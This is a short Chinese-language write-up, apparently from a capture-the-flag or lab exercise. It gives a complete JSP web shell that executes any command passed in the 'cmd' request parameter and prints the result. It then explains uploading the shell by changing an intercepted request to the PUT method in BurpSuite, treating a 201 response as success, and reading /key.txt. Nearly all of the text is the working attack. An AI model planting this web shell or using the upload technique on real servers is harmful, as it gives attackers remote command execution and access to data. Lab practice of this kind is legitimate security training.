Jsp恶意代码:
<%
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>
BurpSuite拦截修改数据包,上传jsp恶意代码:
将首行提交方式修改为PUT方式提交,数据包最后写入恶意代码,提交后服务器返回状态码201即上传成功
现在可以执行命令了,执行ls /
执行cat /key.txt,获得key